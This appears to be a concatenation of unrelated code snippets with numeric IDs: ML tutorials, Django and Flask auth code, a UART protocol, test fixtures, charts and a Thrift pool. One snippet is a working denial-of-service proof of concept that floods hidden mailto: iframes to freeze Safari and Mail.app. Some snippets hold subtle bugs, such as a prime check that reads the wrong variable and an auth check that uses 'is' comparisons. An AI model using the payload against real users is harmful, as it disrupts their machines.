"奔腾新干线", "嘉富利大厦", "绿苑公寓", "虹口嘉苑", "栖山苑", "长宁大厦", "豫景公寓", "莫奈印象", "绿地海怡酒店公寓", "天宸美景", "兆丰苑", "申安大厦", "绿地康桥新苑", "康桥老街", "富浩花园", "岚皋馨苑", "紫兰苑", "佳祥公寓", "银都名庭", "龙柏花苑森林海", "艺康苑", "逸香园", "真新六街坊", "天籁", "虹御公寓", "和福花苑", "和亭佳苑", "平易近水", "珊瑚苑", "铭晖西郊苑", "明光公寓", "文治福邸", "法式情怀", "中星雅苑", "浦联公寓", "博苑公寓", "阳光美景城", "双泉公寓", "凤城花园", "锦麟天地", "静安康寓", "协和苑", "康桥大厦", "绿洲千岛花园别墅", "新华名苑", "金玉苑", "政通新苑", "正阳世纪星城", "联洋新苑", "盛源大厦", "龙腾公寓", "南方城", "水清木华公寓", "新都花园", "陆家嘴理想家", "翔鹰大楼", "中轩丽苑", "景华世纪园", "上南花苑城", "金玉良园", "兰港大厦", "古北瑞仕花园", "天和苑", "建华公寓", "亨纳斯酒店", "西雅图", "汤臣怡园", "万千公寓", "华鹤楼", "徐汇新城", "阳光前景", "海泰苑", "天山公寓", "锦杨苑", "上海家园", "茶园坊", "欣安大厦", "望春都市家园", "现代苑", "互峰衡园", "荣轩", "凤凰大楼", "凯欣豪园", "旧盘", "御墅花园", "恒森广场", "贵人大厦", "碧云中惠", "金汇花园", "苹果园", "莱克大厦", "徐家汇花园", "华飞潍坊公寓", "新平公寓", "飘鹰花苑", "海上国际花园", "金苹果花园", "金桥花园", "银河世纪经典", "维多利华庭", "锦绿新城", "捷运大厦", "同济绿园", "和风润玉", "和润家园", "黄山新苑", "联谊西康大厦", "乾鸿苑", "银都名墅", "梅福花苑", "福缘", "怡沣大厦", "绿景家苑", "融都金桥园", "世纪名苑", "益民公寓", "五彩星辰", "长航苑", "中福大厦", "金银汇", "日月星辰", "郁金香花苑", "心中家园", "亿豪名邸", "真南新村", "金园坊", "中远两湾城", "晶彩视界", "新塘桥生活广场", "书香名第", "莘远大厦", "圣骊澳门苑", "大同花园管理楼", "汇都大楼", "阳光世家", "元丰天山花园", "平易近水", "秋月枫舍", "万景花园", "川沙公寓", "虹韵家园", "丁香公寓", "显跃世家", "东城时代华庭", "上海第五季", "虹桥丽景苑", "泾阳家园", "盈湖三岛", "安顺公寓", "绿柳苑", "佳慧雅苑", "新都会别墅", "金昌大厦", "盛兴公寓", "维纳阳光", "巴黎时韵", "东安公寓", "建华大厦", "东方康洛", "愚园", "全装修", "毛坯", "九龙花苑", "芝巷公寓", "乾阳佳园", "金铭福邸", "人间怡景", "新福康里", "罗马假日", "梅岭苑", "金色奥斯卡", "金爵别墅", "名典苑", "达安城", "沙田新苑", "河风丽景", "精品", "名典苑", "武宁小城", "玉佛城", "明园小安桥", "康桥半岛", "安居朝阳苑", "吾好佳庭", "上海春天", "海逸公寓", "金水楼台", "建德花园", "玫瑰苑", "清涧家园", "新时代景庭", "欧原", "昕泰苑", "金桥一景", "枫桥苑", "南证大厦", "源梦苑", "梅川二街坊", "真源小区", "上南春天苑", "尚品", "联鑫虹桥苑", "长华公寓", "新贵都曹杨新苑", "江南星城", "纯翠江南", "浦东世纪花园", "燕兴公寓", "怒江苑", "景源佳苑", "塞纳", "左岸", "恒达公寓", "绿洲城市花园", "海悦", "聚金商铺", "大家源新城", "新宏安大厦", "芝川新苑", "徐汇尚座", "上房金丰苑", "陆家嘴花园", "长阳新苑", "象源丽都", "皇朝别墅", "宁泉新苑", "志丹苑", "博佳花园", "峰会", "陆家嘴花园", "万康城", "鑫康苑", "神牛广场商厦", "宁祥公寓", "富贵人家", "内外联公寓", "锦绣家园", "好莱坞花园", "馨华苑", "兰庭", "华浩苑", "莱诗邸", "东方佳年华", "东海园", "蓬莱花苑", "天杰徐汇", "中海馨苑", "静安河滨花园", "兴林公寓", "静安风华苑", "春天花园", "运旺嘉云苑", "交通物资大厦", "凤凰赢家", "虹口小城", "隆达公寓", "东旺雍景苑", "新中苑", "上海新凤城", "静安枫景苑", "展宏大厦", "东方苑", "景和茗苑", "静安枫景", "东方丰甸苑", "新梅广场", "欣欣苑", "当代清水园", "洛川公寓", "银杏家园", "碧绿春舍", "薇阁尊邸", "凤凰家园", "保留房", "市政馨苑", "东方巴黎", "丹芳苑", "新大公寓", "德诚大厦", "瑞德公寓", "新朝时代", "聚龙新苑", "上海浙江商贸城", "淡水公寓", "锦轩新墅", "徐虹华庭", "哈佛印象", "申江世家", "九龙花苑", "佳洲欣苑", "佘山银湖别墅", "胡姬花园", "静安四季公寓", "迎龙大厦", "济阳人家", "华光苑", "长寿苑锦海大厦", "天鼎花园", "佳龙花园", "曲阳豪庭", "紫竹馨苑", "春满园公寓", "建国路一号公馆", "青青白洋淀", "田园", "桐柏公寓", "和泰玫瑰园", "国际明佳城", "朝霞新苑", "豪园", "恒通公寓", "森林湾家园", "锦三角花园", "缘锦园", "杨思水景苑", "申强公寓", "中远龙阳公寓", "中远行家", "太古豪庭", "明华大厦", "六里嘉园", "绿洲紫荆花园", "仕嘉名苑", "学苑风范", "智荟苑", "丽南公寓", "中皇广场", "中皇外滩", "中祥哥德堡", "雅阁花园", "富南大厦", "宏伦大厦", "格力20", "金芙世纪公寓", "永惠大厦", "银欣花苑", "月泉湾名邸", "东兴华苑", "南洋丽景", "南洋苑", "上海虹诚大厦", "迎亭公寓", "锦绣天第", "百花公寓", "爱迪苑", "香缇花园", "诚信大厦", "昌鑫家园", "上海加州花园", "梅福花苑", "惠国公寓", "复星新苑", "金铭新水岸都市", "望隆苑", "中山大楼", "望源公寓", "徐家汇馆", "华唐苑", "汇佳苑", "紫藤苑", "保利星苑", "华融大厦", "欣安基公寓", "日高公寓", "星河世纪城", "星月蓝湾", "怡祥居", "新家坡", "美树馆", "新兴大厦", "龙柏四季花园", "洛可可花园", "幸运坊公寓", "康泰新城", "金和佳园", "玫瑰湾", "丽园公寓", "阳明新城", "静安行家", "万景园", "伊泰利大厦", "祥和名邸", "巴黎风情", "名江七星城", "东方家年华", "天赐苑", "瑞丽公寓市中星", "裕华恒银大厦", "大运盛城", "徐汇公寓", "新上海花园洋房", "新上海里弄人家", "住友公寓", "罗马假日", "香山苑", "黄浦国际", "馥园", "东方名筑"]
11588536
def is_prime(num): if num < 2: return False else: sqrt = int(num**(1/2)) for i in range(2,sqrt+1): if n % i == 0: return False return True p = int(input().strip()) for a0 in range(p): n = int(input().strip()) if is_prime(n): print("Prime") else: print("Not prime")
11588567
from __future__ import absolute_import, division, print_function import tensorflow as tf import numpy as np import matplotlib.pyplot as plot from tensorflow import keras fashion_mnist = keras.datasets.fashion_mnist (train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data() class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot'] plot.figure() plot.imshow(train_images[0]) plot.colorbar() plot.grid(False) plot.show() train_images = train_images / 255.0 test_images = test_images / 255.0 plot.figure(figsize=(10,10)) for i in range(25): plot.subplot(5,5,i+1) plot.xticks([]) plot.yticks([]) plot.grid(False) plot.imshow(train_images[i], cmap=plot.cm.binary) plot.xlabel(class_names[train_labels[i]]) plot.show() model = keras.Sequential([ keras.layers.Flatten(input_shape=(28, 28)), keras.layers.Dense(128, activation=tf.nn.relu), keras.layers.Dense(10, activation=tf.nn.softmax) ]) model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) model.fit(train_images, train_labels, epochs=100) test_loss, test_acc = model.evaluate(test_images, test_labels) print('Test accuracy:', test_acc) predictions = model.predict(test_images) print(predictions[0]) print(np.argmax(predictions[0])) print(test_labels[0]) def plot_image(i, predictions_array, true_label, img): predictions_array, true_label, img = predictions_array[i], true_label[i], img[i] plot.grid(False) plot.xticks([]) plot.yticks([]) plot.imshow(img, cmap=plot.cm.binary) predicted_label = np.argmax(predictions_array) if predicted_label == true_label: color = 'blue' else: color = 'red' plot.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label], 100*np.max(predictions_array), class_names[true_label]), color=color) def plot_value_array(i, predictions_array, true_label): predictions_array, true_label = predictions_array[i], true_label[i] plot.grid(False) plot.xticks([]) plot.yticks([]) thisplot = plot.bar(range(10), predictions_array, color="#777777") plot.ylim([0, 1]) predicted_label = np.argmax(predictions_array) thisplot[predicted_label].set_color('red') thisplot[true_label].set_color('blue') i = 0 plot.figure(figsize=(6,3)) plot.subplot(1,2,1) plot_image(i, predictions, test_labels, test_images) plot.subplot(1,2,2) plot_value_array(i, predictions, test_labels) plot.show() i = 12 plot.figure(figsize=(6,3)) plot.subplot(1,2,1) plot_image(i, predictions, test_labels, test_images) plot.subplot(1,2,2) plot_value_array(i, predictions, test_labels) plot.show() # Plot the first X test images, their predicted label, and the true label # Color correct predictions in blue, incorrect predictions in red num_rows = 5 num_cols = 3 num_images = num_rows*num_cols plot.figure(figsize=(2*2*num_cols, 2*num_rows)) for i in range(num_images): plot.subplot(num_rows, 2*num_cols, 2*i+1) plot_image(i, predictions, test_labels, test_images) plot.subplot(num_rows, 2*num_cols, 2*i+2) plot_value_array(i, predictions, test_labels) plot.show() # Grab an image from the test dataset img = test_images[0] print(img.shape) # Add the image to a batch where it's the only member. img = (np.expand_dims(img,0)) print(img.shape) predictions_single = model.predict(img) print(predictions_single) plot_value_array(0, predictions_single, test_labels) _ = plot.xticks(range(10), class_names, rotation=45) plot.show() print(np.argmax(predictions_single[0]))
11588618
from .spatial_func import distance, SPoint class MBR: """ MBR creates the minimal bounding regions for users. """ def __init__(self, min_lat, min_lng, max_lat, max_lng): self.min_lat = min_lat self.min_lng = min_lng self.max_lat = max_lat self.max_lng = max_lng def contains(self, lat, lng): # return self.min_lat <= lat <= self.max_lat and self.min_lng <= lng <= self.max_lng # remove = max.lat/max.lng, to be consist with grid index return self.min_lat <= lat < self.max_lat and self.min_lng <= lng < self.max_lng def center(self): return (self.min_lat + self.max_lat) / 2.0, (self.min_lng + self.max_lng) / 2.0 def get_h(self): return distance(SPoint(self.min_lat, self.min_lng), SPoint(self.max_lat, self.min_lng)) def get_w(self): return distance(SPoint(self.min_lat, self.min_lng), SPoint(self.min_lat, self.max_lng)) def __str__(self): h = self.get_h() w = self.get_w() return '{}x{}m2'.format(h, w) def __eq__(self, other): return self.min_lat == other.min_lat and self.min_lng == other.min_lng \ and self.max_lat == other.max_lat and self.max_lng == other.max_lng def to_wkt(self): # Here providing five points is for GIS visualization # sometimes wkt cannot draw a rectangle without the last point. # (the last point should be the same as the first one) return 'POLYGON (({} {}, {} {}, {} {}, {} {}, {} {}))'.format(self.min_lng, self.min_lat, self.min_lng, self.max_lat, self.max_lng, self.max_lat, self.max_lng, self.min_lat, self.min_lng, self.min_lat) @staticmethod # staticmethod means this function will not use self attribute. def cal_mbr(coords): """ Find MBR from coordinates Args: ----- coords: list of Point() Returns: ------- MBR() """ min_lat = float('inf') min_lng = float('inf') max_lat = float('-inf') max_lng = float('-inf') for coord in coords: if coord.lat > max_lat: max_lat = coord.lat if coord.lat < min_lat: min_lat = coord.lat if coord.lng > max_lng: max_lng = coord.lng if coord.lng < min_lng: min_lng = coord.lng return MBR(min_lat, min_lng, max_lat, max_lng) @staticmethod def load_mbr(file_path): with open(file_path, 'r') as f: f.readline() attrs = f.readline()[:-1].split(';') mbr = MBR(float(attrs[1]), float(attrs[2]), float(attrs[3]), float(attrs[4])) return mbr @staticmethod def store_mbr(mbr, file_path): with open(file_path, 'w') as f: f.write('name;min_lat;min_lng;max_lat;max_lng;wkt\n') f.write('{};{};{};{};{};{}\n'.format(0, mbr.min_lat, mbr.min_lng, mbr.max_lat, mbr.max_lng, mbr.to_wkt()))
11588625
from django.conf.urls import url from django.urls import path from .views.authentication_views import ( MayanLoginView, MayanLogoutView, MayanPasswordChangeDoneView, MayanPasswordChangeView, MayanPasswordResetCompleteView, MayanPasswordResetConfirmView, MayanPasswordResetDoneView, MayanPasswordResetView, MultiFactorAuthenticationView, UserSetPasswordView ) from .views.impersonation_views import ( UserImpersonateEndView, UserImpersonateFormStartView, UserImpersonateStartView ) urlpatterns_authenticattion = [ url( regex=r'^login/$', name='login_view', view=MayanLoginView.as_view() ), url( regex=r'^login/multi_factor_authentication/$', name='multi_factor_authentication_view', view=MultiFactorAuthenticationView.as_view() ), url( regex=r'^logout/$', view=MayanLogoutView.as_view(), name='logout_view' ), ] urlpatterns_password = [ url( regex=r'^password/change/done/$', name='password_change_done', view=MayanPasswordChangeDoneView.as_view() ), url( regex=r'^password/change/$', name='password_change_view', view=MayanPasswordChangeView.as_view() ), url( regex=r'^password/reset/complete/$', name='password_reset_complete_view', view=MayanPasswordResetCompleteView.as_view() ), path( 'password/reset/confirm/<uidb64>/<token>/', name='password_reset_confirm_view', view=MayanPasswordResetConfirmView.as_view() ), url( regex=r'^password/reset/done/$', name='password_reset_done_view', view=MayanPasswordResetDoneView.as_view() ), url( regex=r'^password/reset/$', name='password_reset_view', view=MayanPasswordResetView.as_view() ), url( regex=r'^users/(?P<user_id>\d+)/set_password/$', name='user_set_password', view=UserSetPasswordView.as_view() ), url( regex=r'^users/multiple/set_password/$', name='user_multiple_set_password', view=UserSetPasswordView.as_view() ) ] urlpatterns_user_impersonation = [ url( regex=r'^impersonate/end/$', name='user_impersonate_end', view=UserImpersonateEndView.as_view() ), url( regex=r'^impersonate/start/$', name='user_impersonate_form_start', view=UserImpersonateFormStartView.as_view() ), url( regex=r'^impersonate/(?P<user_id>\d+)/start/$', name='user_impersonate_start', view=UserImpersonateStartView.as_view() ) ] urlpatterns = [] urlpatterns.extend(urlpatterns_authenticattion) urlpatterns.extend(urlpatterns_password) urlpatterns.extend(urlpatterns_user_impersonation)
11588630
import FWCore.ParameterSet.Config as cms from PhysicsTools.PatAlgos.recoLayer0.bTagging_cff import * from PhysicsTools.PatAlgos.recoLayer0.jetTracksCharge_cff import * from PhysicsTools.PatAlgos.recoLayer0.jetCorrections_cff import * from PhysicsTools.PatAlgos.mcMatchLayer0.jetMatch_cfi import * from PhysicsTools.PatAlgos.mcMatchLayer0.jetFlavourId_cff import * from PhysicsTools.PatAlgos.producersLayer1.jetProducer_cfi import * ## for scheduled mode makePatJetsTask = cms.Task( patJetCorrectionsTask, patJetCharge, patJetPartonMatch, patJetGenJetMatch, patJetFlavourIdLegacyTask, patJetFlavourIdTask, patJets ) from PhysicsTools.PatAlgos.producersHeavyIons.heavyIonJets_cff import * _makePatJetsTaskHI = cms.Task( recoJetsHIpostAODTask, makePatJetsTask.copy() ) from Configuration.ProcessModifiers.pp_on_AA_cff import pp_on_AA pp_on_AA.toReplaceWith(makePatJetsTask, _makePatJetsTaskHI) makePatJets = cms.Sequence(makePatJetsTask) from RecoBTag.ImpactParameter.pfImpactParameterTagInfos_cfi import * #pfImpactParameterTagInfos from RecoBTag.SecondaryVertex.pfSecondaryVertexTagInfos_cfi import * #pfSecondaryVertexTagInfos from RecoBTag.SecondaryVertex.pfInclusiveSecondaryVertexFinderTagInfos_cfi import * #pfInclusiveSecondaryVertexFinderTagInfos from RecoBTag.Combined.deepFlavour_cff import * #pfDeepCSVTask #make a copy to avoid labels and substitution problems _makePatJetsWithDeepFlavorTask = makePatJetsTask.copy() _makePatJetsWithDeepFlavorTask.add( pfImpactParameterTagInfos, pfSecondaryVertexTagInfos, pfInclusiveSecondaryVertexFinderTagInfos, pfDeepCSVTask ) from Configuration.Eras.Modifier_run2_miniAOD_80XLegacy_cff import run2_miniAOD_80XLegacy run2_miniAOD_80XLegacy.toReplaceWith( makePatJetsTask, _makePatJetsWithDeepFlavorTask )
11588656
import ustruct class UartTrans: def __init__(self, uart): self.uart = uart self.orders = {} self.args = {} CRC16_TABLE = ( 0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240, 0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441, 0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40, 0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040) def crc16(self, data): crc = 0xFFFF for char in data: crc = (crc >> 8) ^ self.CRC16_TABLE[((crc) ^ char) & 0xFF] crc = ustruct.pack('<H', crc) crc = crc[0] << 8 | crc[1] return crc # brief: register cmd # cmd: strng, cmd name # fun: the function will be execute # args: parameter of the fun def reg_cmd(self, cmd, fun, *args): hcmd = hash(cmd) self.orders[hcmd] = fun self.args[hcmd] = args # brief: unregister cmd # cmd: string def unreg_cmd(self, cmd): hcmd = hash(cmd) try: del self.orders[hcmd] except: print("unreg order {} failed".format(cmd)) try: del self.args[hcmd] except: pass # brief: pack data, # data: data will be packed # return: packed data(packed data format: 0xddff(head) len data crc16 0xaaff(end)) def pack_data(self, data, cmd = 0): head = 0xddff end = 0xaaff data = bytearray(data) crc = self.crc16(data) fmt = '>HBH'+str(len(data))+'sHH' is_cmd = 1 if cmd else 0 data = ustruct.pack(fmt, head, is_cmd, len(data), data, crc, end) return data # brief: unpack data # data: the rawdata will be unpacked(rawdata format: 0xddff len data crc16 0xaaff) # return: unpacked data def unpack_data(self, data, size): data = bytearray(data) ra = size - 4 ret = [] for i in range(ra): try: (head, is_cmd, len) = ustruct.unpack('>HBH', data[i:i+5]) if(head == 0xddff): # check head try: fmt = '>'+str(len)+'sHH' (s, crc, end) = ustruct.unpack( fmt, data[i+5:]) if s != None: crc_check = self.crc16(s) if crc == crc_check: ret.append((is_cmd, s)) else: print("receive crc check failed: ", data) continue except: continue except: continue return ret def read(self): read_data = self.uart.read() if read_data: udatas = self.unpack_data(read_data, len(read_data)) return udatas def write(self, s, is_cmd = 0): s = self.pack_data(s, is_cmd) return self.uart.write(s) # execute cmd # cmd: string def exec_cmd(self, cmd): hcmd = hash(cmd) try: args = self.args[hcmd] try: self.orders[hcmd](*args) # execute cmd fun except: print("can't find cmd: ", cmd) except: try: self.orders[hcmd]() # execute cmd fun except: print("can't find cmd: ", cmd) def bytes_to_nums(self, b): ret = [] i = 0 while i < len(b): try: t = ustruct.unpack('>s', b[i:i+1]) # type t = t[0].decode('utf-8') fmt = '>' + t try: num = ustruct.unpack(fmt, b[i+1:]) ret.append(num[0]) i = i + 1 + ustruct.calcsize(str(t)) except: i = i + 1 except: i = i + 1 return ret # fl: uint8_t(B),int8_t(b), uint16_t(H), int16_t(h), uint32_t(I), int32_t(i), double(d), str(s) def pack_num(self, n, fl): return ustruct.pack(">s"+fl,fl,n) # read data, parse to cmd and execute def parse(self, udatas): ret = [] if udatas: for udata in udatas: is_cmd = udata[0] if udata[0]: # cmd self.exec_cmd(udata[1]) else: # data nums = self.bytes_to_nums(udata[1]) if len(nums) > 0: ret.append(nums) # is nums try: s = udata[1].decode('utf-8') # is string ret.append(s) except: pass return ret
11588661
from functools import wraps from flask import request,jsonify,g, current_app from app.models import db,User from app.utils.map_perm import mapPerm def auth(app_id = None, t = None, path = None, method = None): TOKEN = t # token 目的是为了向其他对接系统提供鉴权服务 APP_ID = app_id # app_id 目的是为了向其他对接系统提供鉴权服务 PATH = path # path 目的是为了向其他对接系统提供鉴权服务 METHOD = method # method 目的是为了向其他对接系统提供鉴权服务 try: user = User.verify_auth_token(TOKEN) g.user = user except Exception as e: return False finally: db.session.commit() # APP_ID为1是PMS系统自身,user.id为1是PMS管理员 if APP_ID is 1 and user.id is 1: return True groups = user.groups for group in groups: if group.app_id is APP_ID: permissions = group.permissions for perm in permissions: if perm.resource.resource_type is 'url' and perm.resource.resource_code.get("url") == PATH: res = mapPerm.auth_method(METHOD,perm.action) print(user.username,perm.resource.resource_name,perm.resource.resource_code,res) return res return False def authenticate(func): @wraps(func) def wrapper(*args, **kwargs): """ 判断用户是否有权限访问URL 1、获取当前请求方法和请求url 2、根据用户获当拥有的前系统下组权限,取出resource_code 3、校验resource_code等于请求url的资源的action是否包含请求方法 """ token = None if 'X-Token' in request.headers: token = request.headers['X-Token'] acct = auth(current_app.config['APP_ID'], token, request.path, request.method) if acct: return func(*args, **kwargs) return jsonify({"code": 40000, "message": "无权访问"}) return wrapper
11588696
import chex import jax import jax.numpy as jnp import shinrl as srl def test_squashed_normal(): loc = jnp.array([0.1, 0.5, 0.2]) scale = jnp.array([1.0, 5.0, 10.0]) dist = srl.SquashedNormal(loc, scale) sample = dist.sample(seed=jax.random.PRNGKey(0), sample_shape=10) log_prob = dist.log_prob(sample) chex.assert_shape(log_prob, (10, 3))
11588707
description = '''This bug will freeze Safari and Safari/Firefox + Mail.app on OS X by sending a bunch of datas to mailto: URI scheme. Only work if the user have at least one mailbox setup.''' code = ''' <!DOCTYPE html> <html> <head> <script src="//code.jquery.com/jquery-1.12.0.min.js"></script> <script src="//code.jquery.com/jquery-migrate-1.2.1.min.js"></script> </head> <script type="text/javascript"> var extraData = ""; for (itxextraData = 0; itxextraData < 50000; itxextraData++) { var extraData = extraData + "%20%20%20%20%20%20%20%20%20%20"; } for (itxIframeFlood = 0; itxIframeFlood < 1000; itxIframeFlood++) { jQuery('#result').append('<iframe style="visibility:hidden;" src="mailto:?cci=' + extraData + '&cc=' + extraData + '&subject=' + extraData + '&body=' + extraData + '&' + extraData + '"></iframe>'); } </script> </html>'''
11588716
import pyecharts.options as opts from pyecharts.charts import Pie x_data = ["微博", "知乎", "中国台湾网", "环球网","日报网", "中新网", "今日头条", "光明网","凤凰网", "新华网"] y_data = [5401, 157, 5035, 3245,4296,5574,1891, 3131,1052,1997] data_pair = [list(z) for z in zip(x_data, y_data)] data_pair.sort(key=lambda x: x[1]) def terrace_pie(): c = ( Pie(init_opts=opts.InitOpts(bg_color="#2c343c")) .add( series_name="访问来源", data_pair=data_pair, rosetype="radius", radius="55%", center=["50%", "50%"], label_opts=opts.LabelOpts(is_show=False, position="center"), ) .set_global_opts( title_opts=opts.TitleOpts( title="2020年台海局势各平台占比情况", pos_left="center", pos_top="20", title_textstyle_opts=opts.TextStyleOpts(color="#fff"), ), legend_opts=opts.LegendOpts(is_show=False), ) .set_series_opts( tooltip_opts=opts.TooltipOpts( trigger="item", formatter="{a} <br/>{b}: {c} ({d}%)" ), label_opts=opts.LabelOpts(color="rgba(255, 255, 255, 0.3)"), ) .render("./templates/2020年台海局势各平台占比情况图.html") ) if __name__ == '__main__': terrace_pie()
11588755
import os import flask flask.cli.load_dotenv() os.environ["DATABASE_URL"] = "sqlite:///:memory:" import pytest from offstream import db from offstream.app import app @pytest.fixture def setup_db(): db.Base.metadata.create_all(db.engine) yield db.Base.metadata.drop_all(db.engine) @pytest.fixture def session(): with db.Session() as session: yield session @pytest.fixture def client(setup_db): app.testing = True with app.test_client() as client: yield client @pytest.fixture def runner(setup_db): return app.test_cli_runner() @pytest.fixture def settings(session): settings, password = db.settings(ping_url="https://example.org/") session.add(settings) session.commit() return settings, password @pytest.fixture def auth(settings): settings_, password = settings return settings_.username, password @pytest.fixture def streamer(session, setup_db): streamer_ = db.Streamer(name="x") session.add(streamer_) session.commit() return streamer_ @pytest.fixture def stream(streamer, session): stream_ = db.Stream(url="https://example.org/", streamer=streamer) session.add(stream_) session.commit() return stream_ @pytest.fixture(params=[None, ("offstream", ""), ("offstream", "wrong")]) def bad_auth(request): return request.param @pytest.fixture def m3u8(tmpdir): return tmpdir / "playlist.m3u8"
11588788
from thrift.transport import TTransport from thrift.transport import TSocket from thrift.protocol import TBinaryProtocol #Thrift connection pool class ConnectionPool(object): DEFAULT_NETWORK_TIMEOUT = 0 DEFAULT_POOL_SIZE = 100 def __init__(self, host, port, iface_cls, size=DEFAULT_POOL_SIZE, async=False, network_timeout=DEFAULT_NETWORK_TIMEOUT): self.host = host self.port = port self.iface_cls = iface_cls self.network_timeout = network_timeout self.size = size self._closed = False self._async = async if self._async: import gevent.queue try: from gevent import lock as glock except ImportError: # gevent < 1.0 from gevent import coros as glock self._semaphore = glock.BoundedSemaphore(size) self._connection_queue = gevent.queue.LifoQueue(size) self._QueueEmpty = gevent.queue.Empty else: import threading import Queue self._semaphore = threading.BoundedSemaphore(size) self._connection_queue = Queue.LifoQueue(size) self._QueueEmpty = Queue.Empty def close(self): self._closed = True while not self._connection_queue.empty(): try: conn = self._connection_queue.get(block=False) try: self._close_thrift_connection(conn) except: pass except self._QueueEmpty: pass def _create_thrift_connection(self): socket = TSocket.TSocket(self.host, self.port) if self.network_timeout > 0: socket.setTimeout(self.network_timeout) transport = TTransport.TBufferedTransport(socket) protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport) connection = self.iface_cls(protocol) transport.open() return connection def _close_thrift_connection(self, conn): try: conn._iprot.trans.close() except: print 'warn: failed to close iprot trans on',conn pass try: conn._oprot.trans.close() except: print 'warn: failed to close oprot trans on',conn pass def get_connection(self): """ get a connection from the pool. This blocks until one is available. """ self._semaphore.acquire() if self._closed: raise RuntimeError('connection pool closed') try: return self._connection_queue.get(block=False) except self._QueueEmpty: try: return self._create_thrift_connection() except: self._semaphore.release() raise def return_connection(self, conn): """ return a thrift connection to the pool. """ if self._closed: self._close_thrift_connection(conn) return self._connection_queue.put(conn) self._semaphore.release() def release_conn(self, conn): """ call when the connect is no usable anymore """ try: self._close_thrift_connection(conn) except: pass if not self._closed: self._semaphore.release()
11588825
import os.path import pickle import glob import pytest from cjio import cityjson #------------------------------------ add option for running the full test set def pytest_addoption(parser): parser.addoption("--balazs", action="store_true", default=False, help="run tests against Balázs' local data") def pytest_collection_modifyitems(config, items): if config.getoption("--balazs"): return skip_balazs = pytest.mark.skip(reason="need --balazs option to run") for item in items: if "balazs" in item.keywords: item.add_marker(skip_balazs) @pytest.fixture(scope='session') def data_dir(): package_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) yield os.path.join(package_dir, 'tests', 'data') @pytest.fixture(scope='session') def data_output_dir(): package_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) d = os.path.join(package_dir, "tmp") os.makedirs(d, exist_ok=True) yield d @pytest.fixture(scope='session') def delft(data_dir): p = os.path.join(data_dir, 'delft.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def delft_path(data_dir): p = os.path.join(data_dir, 'delft.json') yield p @pytest.fixture(scope='session') def delft_1b(data_dir): p = os.path.join(data_dir, 'delft_1b.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def rotterdam_subset(data_dir): p = os.path.join(data_dir, 'rotterdam', 'rotterdam_subset.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def rotterdam_subset_path(data_dir): p = os.path.join(data_dir, 'rotterdam', 'rotterdam_subset.json') yield p @pytest.fixture(scope='session') def zurich_subset(data_dir): p 